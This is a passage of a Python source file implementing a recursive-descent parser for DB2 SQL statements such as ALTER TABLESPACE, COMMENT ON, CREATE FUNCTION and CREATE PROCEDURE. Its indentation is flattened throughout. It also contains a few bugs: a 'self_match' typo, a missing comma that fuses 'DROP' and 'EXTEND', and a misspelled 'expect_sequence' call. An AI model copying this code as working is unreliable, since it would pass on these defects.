if self._expect_one_of(['NOT', 'VALUE']).value == 'NOT':
self._expect_sequence(['LOGGED', 'INITIALLY'])
if self._match('WITH'):
self._expect_sequence(['EMPTY', 'TABLE'])
else:
self._expect('COMPRESSION')
elif self._match('DEACTIVATE'):
self._expect_sequence(['VALUE', 'COMPRESSION'])
else:
break
self._newline()
self._outdent()
def _parse_alter_tablespace_statement(self):
"""Parses an ALTER TABLESPACE statement"""
# ALTER TABLESPACE already matched
self._expect(TT.IDENTIFIER)
first = True
while True:
if self._match('ADD'):
if self._match('TO'):
self._expect_sequence(['STRIPE', 'SET', TT.IDENTIFIER])
self._parse_database_container_clause()
if self._match('ON'):
self._parse_db_partition_list_clause(size=False)
else:
# Ambiguity: could be a Database or a System container
# clause here
reraise = False
self._save_state()
try:
# Try a database clause first
self._parse_database_container_clause()
reraise = True
if self._match('ON'):
self._parse_db_partition_list_clause(size=False)
except ParseError:
# If that fails, rewind and try a system container
# clause
self._restore_state()
if reraise: raise
self._parse_system_container_clause()
self._parse_db_partition_list_clause(size=False)
else:
self._forget_state()
elif self._match('BEGIN'):
self._expect_sequence(['NEW', 'STRIPE', 'SET'])
self._parse_database_container_clause()
if self._match('ON'):
self._parse_db_partition_list_clause(size=False)
elif self._match('DROP'):
self._parse_database_container_clause(size=False)
if self._match('ON'):
self._parse_db_partition_list_clause(size=False)
elif self._match_one_of(['EXTEND', 'REDUCE']):
# Ambiguity: could be a Database or ALL containers clause
reraise = False
self._save_state()
try:
# Try an ALL containers clause first
self._expect_sequence(['(', 'ALL'])
reraise = True
self._match('CONTAINERS')
self._expect(TT.NUMBER)
self._match_one_of(['K', 'M', 'G'])
self._expect(')')
except ParseError:
# If that fails, rewind and try a database container clause
self._restore_state()
if reraise: raise
self._parse_database_container_clause()
else:
self._forget_state()
if self._match('ON'):
self._parse_db_partition_list_clause(size=False)
elif self._match('PREFETCHSIZE'):
if not self._match('AUTOMATIC'):
self._expect(TT.NUMBER)
self._match_one_of(['K', 'M', 'G'])
elif self._match('BUFFERPOOL'):
self._expect(TT.IDENTIFIER)
elif self._match('OVERHEAD'):
self._expect(TT.NUMBER)
elif self._match('TRANSFERRATE'):
self._expect(TT.NUMBER)
elif self._match('NO'):
self._expect_sequence(['FILE', 'SYSTEM', 'CACHING'])
elif self._match('FILE'):
self._expect_sequence(['SYSTEM', 'CACHING'])
elif self._match('DROPPED'):
self._expect_sequence(['TABLE', 'RECOVERY'])
self._expect_one_of(['ON', 'OFF'])
elif self._match('SWITCH'):
self._expect('ONLINE')
elif self._match('INCREASESIZE'):
self._expect(TT.NUMBER)
self._expect_one_of(['K', 'M', 'G', 'PERCENT'])
elif self._match('MAXSIZE'):
if not self_match('NONE'):
self._expect(TT.NUMBER)
self._expect_one_of(['K', 'M', 'G'])
elif self._match('CONVERT'):
self._expect_sequence(['TO', 'LARGE'])
elif first:
self._expected_one_of([
'ADD',
'BEGIN',
'DROP'
'EXTEND',
'REDUCE',
'PREFETCHSIZE',
'BUFFERPOOL',
'OVERHEAD',
'TRANSFERRATE',
'NO',
'FILE',
'DROPPED',
'SWITCH',
'INCREASESIZE',
'MAXSIZE',
'CONVERT',
])
else:
break
first = False
def _parse_alter_threshold_statement(self):
"""Parses an ALTER THRESHOLD statement"""
# ALTER THRESHOLD already matched
self._expect(TT.IDENTIFIER)
while True:
if self._match('WHEN'):
self._parse_threshold_predicate()
self._parse_threshold_exceeded_actions()
elif not self._match_one_of(['ENABLE', 'DISABLE']):
break
def _parse_alter_trusted_context_statement(self):
"""Parses an ALTER TRUSTED CONTEXT statement"""
# ALTER TRUSTED CONTEXT already matched
self._expect(TT.IDENTIFIER)
first = True
while True:
if self._match('ADD'):
if self._match('ATTRIBUTES'):
self._expect('(')
while True:
self._expect_sequence(['ADDRESS', TT.STRING])
if self._match('WITH'):
self._expect_sequence(['ENCRYPTION', TT.STRING])
if not self._match(','):
break
self._expect(')')
elif self._match('USE'):
self._expect('FOR')
while True:
if not self._match('PUBLIC'):
self._expect(TT.IDENTIFIER)
self._match_sequence(['ROLE', TT.IDENTIFIER])
if self._match_one_of(['WITH', 'WITHOUT']):
self._expect('AUTHENTICATION')
if not self._match(','):
break
else:
self._expected_one_of(['ATTRIBUTES', 'USE'])
elif self._match('DROP'):
if self._match('ATTRIBUTES'):
self._expect('(')
while True:
self._expect_sequence(['ADDRESS', TT.STRING])
if not self._match(','):
break
self._expect(')')
elif self._match('USE'):
self._expect('FOR')
while True:
if not self._match('PUBLIC'):
self._expect(TT.IDENTIFIER)
if not self._match(','):
break
else:
self._expected_one_of(['ATTRIBUTES', 'USE'])
elif self._match('ALTER'):
while True:
if self._match('SYSTEM'):
self._expect_sequence(['AUTHID', TT.IDENTIFIER])
elif self._match('ATTRIBUTES'):
self._expect('(')
while True:
self._expect_one_of(['ADDRESS', 'ENCRYPTION'])
self._expect(TT.STRING)
if not self._match(','):
break
self._expect(')')
elif self._match('NO'):
self._expect_sequence(['DEFAULT', 'ROLE'])
elif self._match('DEFAULT'):
self._expect_sequence(['ROLE', TT.IDENTIFIER])
elif not self._match_one_of(['ENABLE', 'DISABLE']):
break
elif self._match('REPLACE'):
self._expect_sequence(['USE', 'FOR'])
while True:
if not self._match('PUBLIC'):
self._expect(TT.IDENTIFIER)
self._match_sequence(['ROLE', TT.IDENTIFIER])
if self._match_one_of(['WITH', 'WITHOUT']):
self._expect('AUTHENTICATION')
if not self._match(','):
break
elif first:
self._expected_one_of(['ALTER', 'ADD', 'DROP', 'REPLACE'])
else:
break
first = False
def _parse_alter_user_mapping_statement(self):
"""Parses an ALTER USER MAPPING statement"""
# ALTER USER MAPPING already matched
if not self._match('USER'):
self._expect_sequence([TT.IDENTIFIER, 'SERVER', TT.IDENTIFIER, 'OPTIONS'])
self._parse_federated_options(alter=True)
def _parse_alter_view_statement(self):
"""Parses an ALTER VIEW statement"""
# ALTER VIEW already matched
self._parse_view_name()
self._expect_one_of(['ENABLE', 'DISABLE'])
self._expect_sequence(['QUERY', 'OPTIMIZATION'])
def _parse_alter_work_action_set_statement(self):
"""Parses an ALTER WORK ACTION SET statement"""
# ALTER WORK ACTION SET already matched
self._expect(TT.IDENTIFIER)
first = True
while True:
if self._match('ADD'):
self._match_sequence(['WORK', 'ACTION'])
self._expect_sequence([TT.IDENTIFIER, 'ON', 'WORK', 'CLASS', TT.IDENTIFIER])
self._parse_action_types_clause()
self._parse_histogram_template_clause()
self._match_one_of(['ENABLE', 'DISABLE'])
elif self._match('ALTER'):
self._match_sequence(['WORK', 'ACTION'])
self._expect(TT.IDENTIFIER)
while True:
if self._match('SET'):
self._expect_sequence(['WORK', 'CLASS', TT.IDENTIFIER])
elif self._match('ACTIVITY'):
self._expect_one_of(['LIFETIME', 'QUEUETIME', 'EXECUTETIME', 'ESIMATEDCOST', 'INTERARRIVALTIME'])
self._expect_sequence(['HISTOGRAM', 'TEMPLATE', TT.IDENTIFIER])
elif self._match_one_of(['ENABLE', 'DISABLE']):
pass
else:
# Ambiguity: could be the end of the loop, or an action
# types clause
self._save_state()
try:
self._parse_action_types_clause()
except ParseError:
self._restore_state()
break
else:
self._forget_state()
elif self._match('DROP'):
self._match_sequence(['WORK', 'ACTION'])
self._expect(TT.IDENTIFIER)
elif self._match_one_of(['ENABLE', 'DISABLE']):
pass
elif first:
self._expected_one_of(['ADD', 'ALTER', 'DROP', 'ENABLE', 'DISABLE'])
else:
break
first = False
def _parse_alter_work_class_set_statement(self):
"""Parses an ALTER WORK CLASS SET statement"""
# ALTER WORK CLASS SET already matched
self._expect(TT.IDENTIFIER)
outer = True
while True:
if self._match('ADD'):
self._match_sequence(['WORK', 'CLASS'])
self._expect(TT.IDENTIFIER)
self._parse_work_attributes()
self._expect('POSITION')
self._parse_position_clause()
elif self._match('ALTER'):
self._match_sequence(['WORK', 'CLASS'])
self._expect(TT.IDENTIFIER)
inner = True
while True:
if self._match('FOR'):
self._parse_for_from_to_clause(alter=True)
elif self._match('POSITION'):
self._parse_position_clause()
elif self._match('ROUTINES'):
self._parse_routines_in_schema_clause(alter=True)
elif inner:
self._expected_one_of(['FOR', 'POSITION', 'ROUTINES'])
else:
break
inner = False
elif self._match('DROP'):
self._match_sequence(['WORK', 'CLASS'])
self._expect(TT.IDENTIFIER)
elif outer:
self._expected_one_of(['ADD', 'ALTER', 'DROP'])
else:
break
outer = False
def _parse_alter_workload_statement(self):
"""Parses an ALTER WORKLOAD statement"""
self._expect(TT.IDENTIFIER)
first = True
while True:
if self._match('ADD'):
self._parse_connection_attributes()
elif self._match('DROP'):
self._parse_connection_attributes()
elif self._match_one_of(['ALLOW', 'DISALLOW']):
self._expect_sequence(['DB', 'ACCESS'])
elif self._match_one_of(['ENABLE', 'DISABLE']):
pass
elif self._match('SERVICE'):
self._expect_sequence(['CLASS', TT.IDENTIFIER])
if self._match('UNDER'):
self._expect(TT.IDENTIFIER)
elif self._match('POSITION'):
self._parse_position_clause()
elif self._match_sequence(['COLLECT', 'ACTIVITY', 'DATA']):
self._parse_collect_activity_data_clause(alter=True)
elif first:
self._expected_one_of([
'ADD',
'DROP',
'ALLOW',
'DISALLOW',
'ENABLE',
'DISABLE',
'SERVICE',
'POSITION',
'COLLECT'
])
else:
break
first = False
def _parse_alter_wrapper_statement(self):
"""Parses an ALTER WRAPPER statement"""
# ALTER WRAPPER already matched
self._expect(TT.IDENTIFIER)
self._expect('OPTIONS')
self._parse_federated_options(alter=True)
def _parse_associate_locators_statement(self):
"""Parses an ASSOCIATE LOCATORS statement in a procedure"""
# ASSOCIATE already matched
self._match_sequence(['RESULT', 'SET'])
self._expect_one_of(['LOCATOR', 'LOCATORS'])
self._expect('(')
self._parse_ident_list()
self._expect(')')
self._expect_sequence(['WITH', 'PROCEDURE'])
self._parse_procedure_name()
def _parse_audit_statement(self):
"""Parses an AUDIT statement"""
# AUDIT already matched
while True:
if self._match_one_of([
'DATABASE',
'SYSADM',
'SYSCTRL',
'SYSMAINT',
'SYSMON',
'SECADM',
'DBADM',
]):
pass
elif self._match('TABLE'):
self._parse_table_name()
elif self._match_sequence(['TRUSTED', 'CONTEXT']):
self._expect(TT.IDENTIFIER)
elif self._match_one_of(['USER', 'GROUP', 'ROLE']):
self._expect(TT.IDENTIFIER)
else:
self._expected_one_of([
'DATABASE',
'SYSADM',
'SYSCTRL',
'SYSMAINT',
'SYSMON',
'SECADM',
'DBADM',
'TABLE',
'TRUSTED',
'USER',
'GROUP',
'ROLE',
])
if not self._match(','):
break
if self._match_one_of(['USING', 'REPLACE']):
self._expect_sequence(['POLICY', TT.IDENTIFIER])
elif not self._match_sequence(['REMOVE', 'POLICY']):
self._expected_one_of(['USING', 'REPLACE', 'REMOVE'])
def _parse_call_statement(self):
"""Parses a CALL statement"""
# CALL already matched
self._parse_subschema_name()
if self._match('(', prespace=False):
if not self._match(')'):
while True:
# Try and parse an optional parameter name
self._save_state()
try:
self._expect(TT.IDENTIFIER)
self._expect('=>')
except ParseError:
self._restore_state()
# Parse the parameter value
self._parse_expression()
if not self._match(','):
break
self._expect(')')
def _parse_case_statement(self):
"""Parses a CASE-conditional in a procedure"""
# CASE already matched
if self._match('WHEN'):
# Parse searched-case-statement
simple = False
self._indent(-1)
else:
# Parse simple-case-statement
self._parse_expression()
self._indent()
self._expect('WHEN')
simple = True
# Parse WHEN clauses (only difference is predicate/expression after
# WHEN)
t = None
while True:
if simple:
self._parse_expression()
else:
self._parse_search_condition()
self._expect('THEN')
self._indent()
while True:
self._parse_compiled_statement()
self._expect((TT.TERMINATOR, ';'))
t = self._match_one_of(['WHEN', 'ELSE', 'END'])
if t:
self._outdent(-1)
t = t.value
break
else:
self._newline()
if t != 'WHEN':
break
# Handle ELSE clause (common to both variations)
if t == 'ELSE':
self._indent()
while True:
self._parse_compiled_statement()
self._expect((TT.TERMINATOR, ';'))
if self._match('END'):
self._outdent(-1)
break
else:
self._newline()
self._outdent(-1)
self._expect('CASE')
def _parse_close_statement(self):
"""Parses a CLOSE cursor statement"""
# CLOSE already matched
self._expect(TT.IDENTIFIER)
self._match_sequence(['WITH', 'RELEASE'])
def _parse_comment_statement(self):
"""Parses a COMMENT ON statement"""
# COMMENT ON already matched
# Ambiguity: table/view can be called TABLE, VIEW, ALIAS, etc.
reraise = False
self._save_state()
try:
# Try parsing an extended TABLE/VIEW comment first
self._parse_relation_name()
self._expect('(')
self._indent()
while True:
self._expect(TT.IDENTIFIER)
self._valign()
self._expect_sequence(['IS', TT.STRING])
reraise = True
if self._match(','):
self._newline()
else:
break
self._vapply()
self._outdent()
self._expect(')')
except ParseError:
# If that fails, rewind and parse a single-object comment
self._restore_state()
if reraise: raise
if self._match_one_of(['ALIAS', 'TABLE', 'NICKNAME', 'INDEX', 'TRIGGER', 'VARIABLE']):
self._parse_subschema_name()
elif self._match('TYPE'):
if self._match('MAPPING'):
self._expect(TT.IDENTIFIER)
else:
self._parse_subschema_name()
elif self._match('PACKAGE'):
self._parse_subschema_name()
self._match('VERSION')
# XXX Ambiguity: IDENTIFIER will match "IS" below. How to solve
# this? Only double-quoted identifiers are actually permitted
# here (or strings)
self._match_one_of([TT.IDENTIFIER, TT.STRING])
elif self._match_one_of(['DISTINCT', 'DATA']):
self._expect('TYPE')
self._parse_type_name()
elif self._match_one_of(['COLUMN', 'CONSTRAINT']):
self._parse_subrelation_name()
elif self._match_one_of(['SCHEMA', 'TABLESPACE', 'WRAPPER', 'WORKLOAD', 'NODEGROUP', 'ROLE', 'THRESHOLD']):
self._expect(TT.IDENTIFIER)
elif self._match_sequence(['DATABASE', 'PARTITION', 'GROUP']):
self._expect(TT.IDENTIFIER)
elif self._match_sequence(['AUDIT', 'POLICY']):
self._expect(TT.IDENTIFIER)
elif self._match_sequence(['SECURITY', 'POLICY']):
self._expect(TT.IDENTIFIER)
elif self._match_sequence(['SECURITY', 'LABEL']):
self._match('COMPONENT')
self._expect(TT.IDENTIFIER)
elif self._match('SERVER'):
if self._match('OPTION'):
self._expect_sequence([TT.IDENTIFIER, 'FOR'])
self._parse_remote_server()
else:
self._expect(TT.IDENTIFIER)
elif self._match('SERVICE'):
self._expect('CLASS')
self._expect(TT.IDENTIFIER)
self._match_sequence(['UNDER', TT.IDENTIFIER])
elif self._match_sequence(['TRUSTED', 'CONTEXT']):
self._expect(TT.IDENTIFIER)
elif self._match_sequence(['HISTOGRAM', 'TEMPLATE']):
self._expect(TT.IDENTIFIER)
elif self._match_sequence(['WORK', 'ACTION', 'SET']):
self._expect(TT.IDENTIFIER)
elif self._match_sequence(['WORK', 'CLASS', 'SET']):
self._expect(TT.IDENTIFIER)
elif self._match('FUNCTION'):
if self._match('MAPPING'):
self._expect(TT.IDENTIFIER)
else:
self._parse_routine_name()
if self._match('(', prespace=False):
self._parse_datatype_list()
self._expect(')')
elif self._match('PROCEDURE'):
self._parse_routine_name()
if self._match('(', prespace=False):
self._parse_datatype_list()
self._expect(')')
elif self._match('SPECIFIC'):
self._expect_one_of(['FUNCTION', 'PROCEDURE'])
self._parse_routine_name()
else:
self._expected_one_of([
'ALIAS',
'AUDIT',
'COLUMN',
'CONSTRAINT',
'DATA',
'DATABASE',
'DISTINCT',
'FUNCTION',
'HISTOGRAM',
'INDEX',
'NICKNAME',
'PROCEDURE',
'ROLE',
'SCHEMA',
'SECURITY',
'SERVER',
'SERVICE',
'SPECIFIC',
'TABLE',
'TABLESPACE',
'THRESHOLD',
'TRIGGER',
'TRUSTED',
'TYPE',
'VARIABLE',
'WORK',
'WORKLOAD',
'WRAPPER',
])
self._expect_sequence(['IS', TT.STRING])
else:
self._forget_state()
def _parse_commit_statement(self):
"""Parses a COMMIT statement"""
# COMMIT already matched
self._match('WORK')
def _parse_create_alias_statement(self):
"""Parses a CREATE ALIAS statement"""
# CREATE ALIAS already matched
self._parse_relation_name()
self._expect('FOR')
self._parse_relation_name()
def _parse_create_audit_policy_statement(self):
"""Parses a CREATE AUDIT POLICY statement"""
# CREATE AUDIT POLICY already matched
self._expect(TT.IDENTIFIER)
self._parse_audit_policy()
def _parse_create_bufferpool_statement(self):
"""Parses a CREATE BUFFERPOOL statement"""
# CREATE BUFFERPOOL already matched
self._expect(TT.IDENTIFIER)
self._match_one_of(['IMMEDIATE', 'DEFERRED'])
if self._match('ALL'):
self._expect('DBPARTITIONNUMS')
elif self._match('DATABASE'):
self._expect_sequence(['PARTITION', 'GROUP'])
self._parse_ident_list()
elif self._match('NODEGROUP'):
self._parse_ident_list()
self._expect('SIZE')
if self._match(TT.NUMBER):
self._match('AUTOMATIC')
elif self._match('AUTOMATIC'):
pass
else:
self._expected_one_of([TT.NUMBER, 'AUTOMATIC'])
# Parse function options (which can appear in any order)
valid = set(['NUMBLOCKPAGES', 'PAGESIZE', 'EXTENDED', 'EXCEPT', 'NOT'])
while valid:
t = self._match_one_of(valid)
if t:
t = t.value
valid.remove(t)
else:
break
if self._match('EXCEPT'):
self._expect('ON')
self._parse_db_partition_list_clause(size=True)
elif t == 'NUMBLOCKPAGES':
self._expect(TT.NUMBER)
if self._match('BLOCKSIZE'):
self._expect(TT.NUMBER)
elif t == 'PAGESIZE':
self._expect(TT.NUMBER)
self._match('K')
elif t == 'EXTENDED':
self._expect('STORAGE')
valid.remove('NOT')
elif t == 'NOT':
self._expect_sequence(['EXTENDED', 'STORAGE'])
valid.remove('EXTENDED')
def _parse_create_database_partition_group_statement(self):
"""Parses an CREATE DATABASE PARTITION GROUP statement"""
# CREATE [DATABASE PARTITION GROUP|NODEGROUP] already matched
self._expect(TT.IDENTIFIER)
if self._match('ON'):
if self._match('ALL'):
self._expect_one_of(['DBPARTITIONNUMS', 'NODES'])
else:
self._parse_db_partition_list_clause(size=False)
def _parse_create_event_monitor_statement(self):
"""Parses a CREATE EVENT MONITOR statement"""
# CREATE EVENT MONITOR already matched
self._expect(TT.IDENTIFIER)
self._expect('FOR')
self._save_state()
try:
self._parse_wlm_event_monitor()
except ParseError:
self._restore_state()
self._parse_nonwlm_event_monitor()
else:
self._forget_state()
def _parse_create_function_statement(self):
"""Parses a CREATE FUNCTION statement"""
# CREATE FUNCTION already matched
self._parse_function_name()
# Parse parameter list
self._expect('(', prespace=False)
if not self._match(')'):
while True:
self._save_state()
try:
self._expect(TT.IDENTIFIER)
self._parse_datatype()
except ParseError:
self._restore_state()
self._parse_datatype()
else:
self._forget_state()
self._match_sequence(['AS', 'LOCATOR'])
if not self._match(','):
break
self._expect(')')
self._indent()
# Parse function options (which can appear in any order)
valid = set([
'ALLOW',
'CALLED',
'CARDINALITY',
'CONTAINS',
'DBINFO',
'DETERMINISTIC',
'DISALLOW',
'EXTERNAL',
'FENCED',
'FINAL',
'INHERIT',
'LANGUAGE',
'MODIFIES',
'NO',
'NOT',
'NULL',
'PARAMETER',
'READS',
'RETURNS',
'SCRATCHPAD',
'SPECIFIC',
'STATIC',
'THREADSAFE',
'TRANSFORM',
'VARIANT',
])
while True:
# Ambiguity: INHERIT SPECIAL REGISTERS (which appears in the
# variable order options) and INHERIT ISOLATION LEVEL (which must
# appear after the variable order options). See below.
self._save_state()
try:
t = self._match_one_of(valid)
if t:
t = t.value
# Note that matches aren't removed from valid, because it's
# simply too complex to figure out what option disallows
# other options in many cases
else:
# break would skip the except and else blocks
raise ParseBacktrack()
if t == 'ALLOW':
self._expect('PARALLEL')
if self._match_sequence(['EXECUTE', 'ON', 'ALL']):
self._match_sequence(['DATABASE', 'PARTITIONS'])
self._expect_sequence(['RESULT', 'TABLE', 'DISTRIBUTED'])
elif t == 'CALLED':
self._expect_sequence(['ON', 'NULL', 'INPUT'])
elif t == 'CARDINALITY':
self._expect(TT.NUMBER)
elif t == 'CONTAINS':
self._expect('SQL')
elif t == 'DBINFO':
pass
elif t == 'DETERMINISTIC':
pass
elif t == 'DISALLOW':
self._expect('PARALLEL')
elif t == 'EXTERNAL':
if self._match('NAME'):
self._expect_one_of([TT.STRING, TT.IDENTIFIER])
else:
self._expect('ACTION')
elif t == 'FENCED':
pass
elif t == 'FINAL':
self._expect('CALL')
elif t == 'INHERIT':
# Try and parse INHERIT SPECIAL REGISTERS first
if not self._match('SPECIAL'):
raise ParseBacktrack()
self._expect('REGISTERS')
elif t == 'LANGUAGE':
self._expect_one_of(['SQL', 'C', 'JAVA', 'CLR', 'OLE'])
elif t == 'MODIFIES':
self._expect_sequence(['SQL', 'DATA'])
elif t == 'NO':
t = self._expect_one_of(['DBINFO', 'EXTERNAL', 'FINAL', 'SCRATCHPAD', 'SQL']).value
if t == 'EXTERNAL':
self._expect('ACTION')
elif t == 'FINAL':
self._expect('CALL')
elif t == 'NOT':
self._expect_one_of(['DETERMINISTIC', 'FENCED', 'THREADSAFE', 'VARIANT'])
elif t == 'NULL':
self._expect('CALL')
elif t == 'PARAMETER':
if self._match('CCSID'):
self._expect_one_of(['ASCII', 'UNICODE'])
else:
self._expect('STYLE')
self._expect_one_of(['DB2GENERAL', 'DB2GENERL', 'JAVA', 'SQL', 'DB2SQL'])
elif t == 'READS':
self._expect_sequence(['SQL', 'DATA'])
elif t == 'RETURNS':
if self._match('NULL'):
self._expect_sequence(['ON', 'NULL', 'INPUT'])
elif self._match_one_of(['ROW', 'TABLE']):
if self._match('('):
while True:
self._expect(TT.IDENTIFIER)
self._parse_datatype()
self._match_sequence(['AS', 'LOCATOR'])
if not self._match(','):
break
self._expect(')')
else:
self._parse_datatype()
if self._match_sequence(['CAST', 'FROM']):
self._parse_datatype()
self._match_sequence(['AS', 'LOCATOR'])
elif t == 'SCRATCHPAD':
self._expect(TT.NUMBER)
elif t == 'SPECIFIC':
self._expect(TT.IDENTIFIER)
elif t == 'STATIC':
self._expect('DISPATCH')
elif t == 'THREADSAFE':
pass
elif t == 'TRANSFORM':
self._expect_sequence(['GROUP', TT.IDENTIFIER])
elif t == 'VARIANT':
pass
self._newline()
except ParseBacktrack:
# NOTE: This block only gets called for ParseBacktrack errors.
# Other parse errors will propogate outward. If the above has
# failed, rewind, and drop out of the loop so we can try
# INHERIT ISOLATION LEVEL (and PREDICATES)
self._restore_state()
break
else:
self._forget_state()
# Parse optional PREDICATES clause
if self._match('PREDICATES'):
self._parse_function_predicates_clause()
self._newline()
if self._match('INHERIT'):
self._expect_sequence(['ISOLATION', 'LEVEL'])
self._expect_one_of(['WITH', 'WITHOUT'])
self._expect_sequence(['LOCK', 'REQUEST'])
# Parse the function body
self._outdent()
if self._match('BEGIN'):
self._parse_compiled_compound_statement()
elif self._match('RETURN'):
self._indent()
self._parse_return_statement()
self._outdent()
else:
# External function with no body
pass
def _parse_create_function_mapping_statement(self):
"""Parses a CREATE FUNCTION MAPPING statement"""
# CREATE FUNCTION MAPPING already matched
if not self._match('FOR'):
self._expect_sequence([TT.IDENTIFIER, 'FOR'])
if not self._match('SPECIFIC'):
self._parse_function_name()
self._expect('(', prespace=False)
self._parse_datatype_list()
self._expect(')')
else:
self._parse_function_name()
self._expect('SERVER')
self._parse_remote_server()
if self._match('OPTIONS'):
self._parse_federated_options()
self._match_sequence(['WITH', 'INFIX'])
def _parse_create_histogram_template_statement(self):
"""Parses a CREATE HISTOGRAM TEMPLATE statement"""
# CREATE HISTOGRAM TEMPLATE already matched
self._expect_sequence([TT.IDENTIFIER, 'HIGH', 'BIN', 'VALUE', TT.NUMBER])
def _parse_create_index_statement(self, unique):
"""Parses a CREATE INDEX statement"""
# CREATE [UNIQUE] INDEX already matched
self._parse_index_name()
self._indent()
self._expect('ON')
self._parse_table_name()
self._expect('(')
self._indent()
while True:
if self._match('BUSINESS_TIME'):
self._expect_sequence(['WITHOUT', 'OVERLAPS'])
else:
self._expect(TT.IDENTIFIER)
self._match_one_of(['ASC', 'DESC'])
if not self._match(','):
break
else:
self._newline()
self._outdent()
self._expect(')')
valid = set([
'IN',
'PARTITIONED',
'NOT',
'SPECIFICATION',
'INCLUDE',
'CLUSTER',
'PCTFREE',
'LEVEL2',
'MINPCTUSED',
'ALLOW',
'DISALLOW',
'PAGE',
'COLLECT',
'COMPRESS',
])
while valid:
t = self._match_one_of(valid)
if t:
self._newline(-1)
t = t.value
valid.remove(t)
else:
break
if t == 'IN':
self._expect(TT.IDENTIFIER)
elif t == 'NOT':
self._expect('PARTITIONED')
valid.discard('NOT')
elif t == 'PARTITIONED':
valid.discard('NOT')
elif t == 'SPECIFICATION':
self._expect('ONLY')
elif t == 'INCLUDE':
self._expect('(')
self._indent()
self._parse_ident_list(newlines=True)
self._outdent()
self._expect(')')
elif t == 'CLUSTER':
pass
elif t == 'PCTFREE' or t == 'MINPCTUSED':
self._expect(TT.NUMBER)
elif t == 'LEVEL2':
self._expect_sequence(['PCTFREE', TT.NUMBER])
elif t == 'ALLOW' or t == 'DISALLOW':
valid.discard('ALLOW')
valid.discard('DISALLOW')
self._expect_sequence(['REVERSE', 'SCANS'])
elif t == 'PAGE':
self._expect('SPLIT')
self._expect_one_of(['SYMMETRIC', 'HIGH', 'LOW'])
elif t == 'COLLECT':
self._match('SAMPLED')
self._match('DETAILED')
self._expect('STATISTICS')
elif t == 'COMPRESS':
self._expect_one_of(['NO', 'YES'])
def _parse_create_module_statement(self):
"""Parses a CREATE MODULE statement"""
# CREATE MODULE already matched
self._parse_module_name()
def _parse_create_nickname_statement(self):
"""Parses a CREATE NICKNAME statement"""
# CREATE NICKNAME already matched
self._parse_nickname_name()
if self._match('FOR'):
self._parse_remote_object_name()
else:
self._parse_table_definition(aligntypes=True, alignoptions=True, federated=True)
self._expect_sequence(['FOR', 'SERVER', TT.IDENTIFIER])
if self._match('OPTIONS'):
self._parse_federated_options()
def _parse_create_procedure_statement(self):
"""Parses a CREATE PROCEDURE statement"""
# CREATE PROCEDURE already matched
self._parse_procedure_name()
if self._match('SOURCE'):
self._parse_source_object_name()
if self._match('(', prespace=False):
self._expect(')')
elif self._match('NUMBER'):
self._expect_sequence(['OF', 'PARAMETERS', TT.NUMBER])
if self._match('UNIQUE'):
self._expect(TT.STRING)
self.expect_sequence(['FOR', 'SERVER', TT.IDENTIFIER])
elif self._match('(', prespace=False):
if not self._match(')'):
while True:
self._match_one_of(['IN', 'OUT', 'INOUT'])
self._save_state()
try:
self._expect(TT.IDENTIFIER)
self._parse_datatype()
except ParseError:
self._restore_state()
self._parse_datatype()
else:
self._forget_state()
if self._match('DEFAULT'):
self._parse_expression()
if not self._match(','):
break
self._expect(')')
self._indent()
# Parse procedure options (which can appear in any order)
valid = set([
'AUTONOMOUS',
'CALLED',
'COMMIT',
'CONTAINS',
'DBINFO',
'DETERMINISTIC',
'DYNAMIC',
'EXTERNAL',
'FENCED',
'INHERIT',
'LANGUAGE',
'MODIFIES',
'NEW',
'NO',
'NOT',
'NOT',
'NULL',
'OLD',
'PARAMETER',
'PROGRAM',
'READS',
'RESULT',
'SPECIFIC',
'THREADSAFE',
'WITH',
])
while True:
t = self._match_one_of(valid)
if t:
t = t.value
# Note that matches aren't removed from valid, because it's
# simply too complex to figure out what option disallows other
# options in many cases
else:
break
if t == 'AUTONOMOUS':
pass
elif t == 'CALLED':
self._expect_sequence(['ON', 'NULL', 'INPUT'])
elif t == 'COMMIT':
self._expect_sequence(['ON', 'RETURN'])
self._expect_one_of(['NO', 'YES'])
elif t == 'CONTAINS':
self._expect('SQL')
elif t == 'DBINFO':
pass
elif t == 'DETERMINISTIC':
pass
elif t == 'DYNAMIC':
self._expect_sequence(['RESULT', 'SETS', TT.NUMBER])
elif t == 'EXTERNAL':
if self._match('NAME'):
self._expect_one_of([TT.STRING, TT.IDENTIFIER])
else:
self._expect('ACTION')
elif t == 'FENCED':
pass
elif t == 'INHERIT':
self._expect_sequence(['SPECIAL', 'REGISTERS'])
elif t == 'LANGUAGE':
self._expect_one_of(['SQL', 'C', 'JAVA', 'COBOL', 'CLR', 'OLE'])
elif t == 'MODIFIES':
self._expect_sequence(['SQL', 'DATA'])
elif t in ['NEW', 'OLD']:
self._expect_sequence(['SAVEPOINT', 'LEVEL'])
elif t == 'NO':
if self._match('EXTERNAL'):
self._expect('ACTION')
else:
self._expect_one_of(['DBINFO', 'SQL'])
elif t == 'NOT':
self._expect_one_of(['DETERMINISTIC', 'FENCED', 'THREADSAFE'])
elif t == 'NULL':
self._expect('CALL')
elif t == 'PARAMETER':
if self._match('CCSID'):
self._expect_one_of(['ASCII', 'UNICODE'])
else:
self._expect('STYLE')
p = self._expect_one_of([
'DB2GENERAL',
'DB2GENERL',
'DB2DARI',
'DB2SQL',
'GENERAL',
'SIMPLE',
'JAVA',
'SQL'
]).value
if p == 'GENERAL':
self._match_sequence(['WITH', 'NULLS'])
elif p == 'SIMPLE':
self._expect('CALL')
self._match_sequence(['WITH', 'NULLS'])
elif t == 'PROGRAM':
self._expect('TYPE')
self._expect_one_of(['SUB', 'MAIN'])
elif t == 'READS':
self._expect_sequence(['SQL', 'DATA'])
elif t == 'RESULT':
self._expect_sequence(['SETS', TT.NUMBER])
elif t == 'SPECIFIC':
self._expect(TT.IDENTIFIER)
elif t == 'THREADSAFE':
pass
elif t == 'WITH':
self._expect_sequence(['RETURN', 'TO'])
self._expect_one_of(['CALLER', 'CLIENT'])
self._expect('ALL')
self._newline()
self._outdent()
self._expect('BEGIN')
self._parse_compiled_compound_statement()
def _parse_create_role_statement(self):
"""Parses a CREATE ROLE statement"""
# CREATE ROLE already matched
self._expect(TT.IDENTIFIER)
def _parse_create_schema_statement(self):
"""Parses a CREATE SCHEMA statement"""
# CREATE SCHEMA already matched
if self._match('AUTHORIZATION'):
self._expect(TT.IDENTIFIER)
else:
self._expect(TT.IDENTIFIER)
if self._match('AUTHORIZATION'):
self._expect(TT.IDENTIFIER)
# Parse CREATE/COMMENT/GRANT statements
while True:
if self._match('CREATE'):
if self._match('TABLE'):
self._parse_create_table_statement()
elif self._match('VIEW'):
